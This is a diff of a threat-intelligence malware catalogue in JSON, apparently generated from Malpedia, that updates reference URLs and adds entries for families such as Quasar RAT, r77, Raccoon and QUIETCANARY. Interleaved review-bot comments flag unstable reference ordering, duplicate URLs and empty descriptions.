+ "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs"
],
"synonyms": [
"Oakboat",
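Review bot: the regenerated refs array for this cluster still lists the same source more than once under URLs that differ only in scheme, locale path or share-tracking parameters, for example `https://www.secureworks.com/research/threat-profiles/gold-lagoon` next to `http://www.secureworks.com/research/threat-profiles/gold-lagoon`, `https://twitter.com/embee_research/status/1592067841154756610?s=20` next to the same status with `&t=hEALPAWr1LIt9pXcVpxjRQ` appended, and `https://www.elastic.co/security-labs/qbot-malware-analysis` next to `https://www.elastic.co/de/security-labs/qbot-malware-analysis`. Normalising refs in the generator before emitting (prefer https, drop `?s=`/`&t=` share tokens, collapse locale prefixes) would deduplicate these. Separately, most of the churn in this hunk is unchanged URLs being removed and re-inserted in a different position (the YouTube, isc.sans.edu and Black Hat links all appear on both sides), which means the refs array is not emitted in a stable order; sorting it would leave only the genuinely new references in the diff.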
@@ -37610,15 +39621,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
- "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
+ "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/",
"https://twitter.com/Arkbird_SOLG/status/1458973883068043264",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
- "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
],
"synonyms": [],
"type": []
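Review bot: this hunk is a pure reordering: all five removed URLs (the two CERTFR PDFs, the malwarebreakdown, Malwarebytes and Trend Micro posts) reappear as added lines and nothing is actually added or dropped, so the hunk carries no content change. That points to the refs array being written in whatever order the upstream source returns it; sorting the array, or preserving the existing order when regenerating, would avoid this churn and keep real reference changes reviewable.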
@@ -37631,76 +39642,79 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
- "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
- "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
- "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat",
- "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
- "https://blog.minerva-labs.com/trapping-quasar-rat",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
- "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
- "https://twitter.com/struppigel/status/1130455143504318466",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html",
- "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
- "https://www.antiy.cn/research/notice&report/research_report/20201228.html",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://asec.ahnlab.com/en/31089/",
"https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
+ "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
+ "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
+ "https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/",
+ "https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
+ "https://twitter.com/malwrhunterteam/status/789153556255342596",
+ "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage",
+ "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
+ "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html",
+ "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.antiy.cn/research/notice&report/research_report/20201228.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/",
+ "https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat",
"https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934",
- "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848",
- "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
- "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/",
- "https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://blog.malwarelab.pl/posts/venom/",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments",
- "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
- "https://intel471.com/blog/privateloader-malware",
- "https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
- "https://twitter.com/malwrhunterteam/status/789153556255342596",
- "https://asec.ahnlab.com/en/31089/",
- "https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
- "https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ",
- "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage",
- "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf",
+ "https://blog.minerva-labs.com/trapping-quasar-rat",
+ "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
+ "https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/",
+ "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass",
+ "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques",
+ "https://blog.malwarelab.pl/posts/venom/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments",
+ "https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://twitter.com/struppigel/status/1130455143504318466",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
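Review bot: almost every reference in this hunk is deleted and re-inserted in a different order (`https://blog.ensilo.com/uncovering-new-activity-by-apt10` and `https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf`, for example, appear on both a `-` and a `+` line), so the real change, a handful of new refs such as the PwC Cloud Hopper annex and the lab52 post, is buried in churn. If the generator writes refs in whatever order Malpedia returns them, sort the list before emitting JSON so future diffs show only additions and removals. Separately, the re-added `http://researchcenter.paloaltonetworks.com/2017/01/...` entry is the only plain-http URL in the list; the malformed `...seeds-of-discord?` entry this hunk drops is a good reminder to normalise URLs once at generation time rather than by hand.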
@@ -37740,6 +39754,23 @@
"uuid": "56d5ee92-845e-4b71-814c-2b0f0ca88523",
"value": "QUICKMUTE"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quietcanary",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity"
+ ],
+ "synonyms": [
+ "Kapushka",
+ "Tunnus"
+ ],
+ "type": []
+ },
+ "uuid": "2577fb8d-1511-49f7-9b62-7816137190c8",
+ "value": "QUIETCANARY"
+ },
{
"description": "According to Microsoft, this is a heavily obfuscated .NET malware, primarily geared towards the exfiltration of data from the compromised host. But it can also receive and execute a remote payload from the operator.",
"meta": {
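Review bot: the new QUIETCANARY cluster ships with `"description": ""` and `"type": []` even though it carries two vendor write-ups (securelist, mandiant) and two synonyms. The Ramnit entry later in this patch shows the convention of filling the description from the cited source; do the same here, or leave the empty fields out, rather than adding a cluster that says nothing about what the family is.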
@@ -37781,6 +39812,22 @@
"uuid": "020950da-79e5-481b-9986-14ed1c97e04c",
"value": "QvoidStealer"
},
+ {
+ "description": "According to the author, r77 is a ring 3 rootkit that hides everything: \r\n* Files, directories\r\n* Processes & CPU usage\r\n* Registry keys & values\r\n* Services\r\n* TCP & UDP connections\r\n* Junctions, named pipes, scheduled tasks",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.r77",
+ "https://github.com/bytecode77/r77-rootkit",
+ "https://twitter.com/malmoeb/status/1523179260273254407"
+ ],
+ "synonyms": [
+ "r77 Rootkit"
+ ],
+ "type": []
+ },
+ "uuid": "f577050b-a4a3-4ebd-a9d9-77300f3435f5",
+ "value": "r77"
+ },
{
"description": "",
"meta": {
@@ -37799,53 +39846,60 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon",
- "https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/",
- "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
- "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/",
- "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer",
- "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/",
- "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/",
- "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
- "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
- "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
- "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
- "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block",
- "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf",
- "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/",
- "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
- "https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/",
- "https://www.group-ib.com/blog/fakesecurity_raccoon",
- "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d",
- "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html",
- "https://www.youtube.com/watch?v=5KHZSmBeMps",
- "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://www.riskiq.com/blog/labs/magecart-medialand/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf",
- "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/",
- "https://www.youtube.com/watch?v=1dbepxN2YD8",
- "https://d01a.github.io/raccoon-stealer/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
- "https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/",
- "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
- "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://asec.ahnlab.com/en/35981/",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://asec.ahnlab.com/ko/25837/",
- "https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram",
- "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949",
"https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/",
+ "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
+ "https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/",
+ "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
+ "https://d01a.github.io/raccoon-stealer/",
+ "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
+ "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8",
+ "https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram",
+ "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
+ "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html",
+ "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/",
+ "https://asec.ahnlab.com/en/35981/",
+ "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf",
+ "https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/",
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
+ "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer",
+ "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block",
+ "https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view",
+ "https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/",
+ "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949",
+ "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/",
+ "https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation",
+ "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/",
"https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d",
- "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/",
+ "https://www.group-ib.com/blog/fakesecurity_raccoon",
+ "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon",
+ "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d",
+ "https://www.riskiq.com/blog/labs/magecart-medialand/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.youtube.com/watch?v=5KHZSmBeMps",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf",
+ "https://www.youtube.com/watch?v=1dbepxN2YD8",
+ "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family"
],
"synonyms": [
"Mohazo",
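Review bot: two of the Raccoon references are not durable citations: the newly added `https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view` is an opaque file share with no title or owner, and the retained `https://webcache.googleusercontent.com/search?q=cache:...ultrahacks.org/shop/product/raccoon-stealer-onion-panel/...` is a Google cache snapshot of a criminal shop page. Both can vanish or change silently; replace them with archive.org permalinks (and, for the Drive file, say what it is) or drop them. The rest of the hunk is reorder churn around six genuine additions (infosecwriteups, the @lcam Medium post, the Team Cymru Seychelles post, the justice.gov indictment, cloudsek, prodaft), which a stable sort would make visible at a glance.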
@@ -37858,6 +39912,20 @@
"uuid": "027fb7d0-3e9b-4433-aee1-c266e165a5cc",
"value": "Raccoon"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "993db92e-0c84-4750-a58f-2b61d6cd6d67",
+ "value": "Racket Downloader"
+ },
{
"description": "",
"meta": {
@@ -37901,51 +39969,52 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/",
- "https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/",
- "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf",
- "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information",
- "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
- "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/",
